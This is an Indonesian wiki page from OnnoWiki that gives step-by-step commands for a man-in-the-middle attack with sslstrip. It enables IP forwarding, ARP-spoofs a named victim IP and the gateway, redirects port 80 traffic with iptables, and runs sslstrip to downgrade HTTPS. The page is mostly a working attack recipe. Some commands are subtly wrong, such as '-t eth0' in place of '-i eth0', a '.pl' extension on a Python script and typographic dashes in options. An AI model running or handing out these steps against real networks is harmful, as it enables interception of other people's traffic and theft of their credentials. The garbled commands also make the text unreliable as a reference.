MITM: sslstrip

From OnnoWiki
Revision as of 16:34, 4 April 2017 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing,

route -n
netstat -nr

enable forward paket,

echo “1” > /proc/sys/net/ipv4/ip_forward

lakukan arpspoof,

arpspoof -i eth0 -t victimip routerip
arpspoof -t eth0 -t 192.168.109.18 192.168.109.2
192.168.109.18 = ip victim
192.168.109.2  = ip router / gateway


redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000

Jalankan sslstrip agar listen pada port 1000

sslstrip -l 1000
python sslstrip.pl –l 1000



Referensi